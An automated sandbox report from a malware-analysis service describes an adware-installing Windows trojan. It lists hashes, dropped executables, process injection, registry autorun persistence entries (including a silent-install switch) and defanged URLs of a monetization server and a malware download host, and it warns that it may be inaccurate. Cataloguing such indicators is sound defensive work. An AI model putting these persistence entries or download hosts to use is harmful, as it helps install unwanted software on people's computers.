Gen.Variant.Strictor.115949_b4fe182aab

Gen:Variant.MSILPerseus.132787 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Adware.WizzMonetize.1 (DrWeb), Gen:Variant.MSILPerseus.132787 (B) (Emsisoft), Gen:Variant.MSILPerseus.132787 (FSecu...
Blog rating:2 out of5 with1 ratings

Gen.Variant.Strictor.115949_b4fe182aab

by malwarelabrobot on February 18th, 2018 in Malware Descriptions.

Gen:Variant.MSILPerseus.132787 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Adware.WizzMonetize.1 (DrWeb), Gen:Variant.MSILPerseus.132787 (B) (Emsisoft), Gen:Variant.MSILPerseus.132787 (FSecure), Gen:Variant.Strictor.115949 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan, Installer, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b4fe182aabdf334650d85a4fd4ee7387
SHA1: 93f82e4299379abf70b0c67a58849f2d1395871a
SHA256: d2d3d3153fa42115d29419a611b3f1bdaf1089c128ae9532f5af69059bf868b9
SSDeep: 6144:u daMRXzd GXI86D CXtHXljf5RRRERRRqfVJGiRRT3RRCyRRRRRRRRRRGXRaCRJ:BaKJ GXI8K CjNJURx44V
Size: 252416 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-11-20 18:55:50
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

SecondL.exe:2360
b5rtg3zapo3.exe:1652
advise.exe:3444
PsVMEKV4knRwp57KTHIw.exe:2980
%original file name%.exe:1828
up.exe:2324
caster19.exe:2672
caster12.exe:3192

The Trojan injects its code into the following process(es):

PsVMEKV4knRwp57KTHIw.exe:2060
%original file name%.exe:776
UPT95S6V7.exe:1004
b5rtg3zapo3.tmp:796
RW4BpXx91k.exe:3924
S5XXHD713.exe:2920

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process SecondL.exe:2360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\4lqucguhhjm\b5rtg3zapo3.exe (40036 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1404 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (1404 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1404 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2360.8581084 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2360.8581068 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2360.8581068 (0 bytes)

The process b5rtg3zapo3.exe:1652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BLNU1.tmp\b5rtg3zapo3.tmp (1596 bytes)

The process advise.exe:3444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PsVMEKV4knRwp57KTHIw.exe (4928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RW4BpXx91k.exe (40552 bytes)

The process PsVMEKV4knRwp57KTHIw.exe:2060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\up.exe (152871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\up.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\SecondL.exe (196 bytes)

The process %original file name%.exe:776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster19.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster19.exe (2772 bytes)
C:\config.conf (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster12.exe (3070 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\advise.exe (156286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster12.exe.config (1 bytes)

The process UPT95S6V7.exe:1004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\UPT95S6V7I\cast.config (38 bytes)

The process b5rtg3zapo3.tmp:796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\itdownload.dll (1489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\idp.dll (1502 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\psvince.dll (88 bytes)

The process RW4BpXx91k.exe:3924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (38 bytes)

The process up.exe:2324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1384 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1608 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (1608 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2324.8582878 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2324.8582878 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2324.8582878 (0 bytes)

The process caster19.exe:2672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\UPT95S6V7I\uninstaller.exe.config (1 bytes)
%Program Files%\UPT95S6V7I\uninstaller.exe (2590 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
%Program Files%\UPT95S6V7I\UPT95S6V7.exe (46396 bytes)
%Program Files%\UPT95S6V7I\UPT95S6V7.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)

The process S5XXHD713.exe:2920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\S5XXHD713O\cast.config (38 bytes)

The process caster12.exe:3192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\S5XXHD713O\S5XXHD713.exe.config (1 bytes)
%Program Files%\S5XXHD713O\uninstaller.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
%Program Files%\S5XXHD713O\S5XXHD713.exe (54620 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
%Program Files%\S5XXHD713O\uninstaller.exe (374 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3192.8572036 (0 bytes)

Registry activity

The process SecondL.exe:2360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process advise.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "17/02/2018"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\wewewe]
"Product" = "diskpower"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\wewewe]
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process PsVMEKV4knRwp57KTHIw.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\PsVMEKV4knRwp57KTHIw_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\PsVMEKV4knRwp57KTHIw_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\PsVMEKV4knRwp57KTHIw_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\PsVMEKV4knRwp57KTHIw_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\PsVMEKV4knRwp57KTHIw_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_X2481" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PsVMEKV4knRwp57KTHIw.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process PsVMEKV4knRwp57KTHIw.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\b4fe182aabdf334650d85a4fd4ee7387_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\b4fe182aabdf334650d85a4fd4ee7387_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\b4fe182aabdf334650d85a4fd4ee7387_RASMANCS]
"EnableConsoleTracing" = "0"

"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\b4fe182aabdf334650d85a4fd4ee7387_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\b4fe182aabdf334650d85a4fd4ee7387_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\b4fe182aabdf334650d85a4fd4ee7387_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\b4fe182aabdf334650d85a4fd4ee7387_RASAPI32]
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OTUTPRODUCT_EMMLQ" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:1828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process UPT95S6V7.exe:1004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UPT95S6V7_RASMANCS]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"2XEC55JKCEAFOYK" = "%Program Files%\UPT95S6V7I\UPT95S6V7.exe"

The process b5rtg3zapo3.tmp:796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "1C 03 00 00 9F 6B 17 26 38 A8 D3 01"
"SessionHash" = "62 16 C8 28 99 0A 2E 08 CE FB 61 F6 3C CC 71 95"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5739710" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\4lqucguhhjm\b5rtg3zapo3.exe /VERYSILENT"

The process RW4BpXx91k.exe:3924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASAPI32]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\RW4BpXx91k_RASMANCS]
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"FU5JGMAB1J9RQTX" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RW4BpXx91k.exe"

The process up.exe:2324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"MaxFileSize" = "1048576"

The process caster19.exe:2672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\caster19_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\caster19_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\caster19_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\caster19_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\caster19_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\caster19_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process S5XXHD713.exe:2920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\S5XXHD713_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\S5XXHD713_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\S5XXHD713_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\S5XXHD713_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\S5XXHD713_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\S5XXHD713_RASMANCS]
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YCPAP0FFQR1222R" = "%Program Files%\S5XXHD713O\S5XXHD713.exe"

The process caster12.exe:3192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\caster12_RASMANCS]
"ConsoleTracingMask" = "4294901760"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
21deaebea96f9aabac4d63e43c153f34 c:\Program Files\S5XXHD713O\S5XXHD713.exe
66e11ca37a0aa7920b3706254d3dd9a7 c:\Program Files\S5XXHD713O\uninstaller.exe
21deaebea96f9aabac4d63e43c153f34 c:\Program Files\UPT95S6V7I\UPT95S6V7.exe
66e11ca37a0aa7920b3706254d3dd9a7 c:\Program Files\UPT95S6V7I\uninstaller.exe
2a37a7e9300a03e097bffd156e65d109 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\advise.exe
07bcbbb7e2d2cc7b81c7049a8654f7f4 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster12.exe
07bcbbb7e2d2cc7b81c7049a8654f7f4 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\F9O442FHXQ\caster19.exe
ec9bcfdd4c2596623f10823f24788365 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\SecondL.exe
db15356a5c55b7dfd1d337ff117922c3 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\FE85B92UMK\up.exe
41e2d43765962e24b1d60d87db649aa2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\PsVMEKV4knRwp57KTHIw.exe
21deaebea96f9aabac4d63e43c153f34 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\RW4BpXx91k.exe
472a801f187a7f5410f94bf747b9544b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-BLNU1.tmp\b5rtg3zapo3.tmp
b37377d34c8262a90ff95a9a92b65ed8 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\idp.dll
d82a429efd885ca0f324dd92afb6b7b8 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\itdownload.dll
d726d1db6c265703dcd79b29adc63f86 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-Q041K.tmp\psvince.dll
7b0044341700dc9c45b7d2beee1128f4 c:\Users\"%CurrentUserName%"\AppData\Roaming\4lqucguhhjm\b5rtg3zapo3.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: SZYYY3
Product Name: SZYYY3
Product Version: 6.1.8.7
Legal Copyright: Copyright (c) 8496
Legal Trademarks:
Original Filename: Ksa88.exe
Internal Name: Ksa88.exe
File Version: 6.1.8.7
File Description: SZYYY
Comments: SZYYY3F
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 45904 46080 4.3026 20c797b50b43d4034525e7a902a1993c
.rsrc 57344 204996 205312 3.89404 383f4d31de70684e2c2523473d2350eb
.reloc 270336 12 512 0.056519 99cc4501dae85272d642d7aef5479e10

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.tutomonetize.com/remotes_xml_sections.php 94.23.44.92
hxxp://asedownloadgate.com/download/3/wizzcaster_installer_v2.exe 46.105.121.115
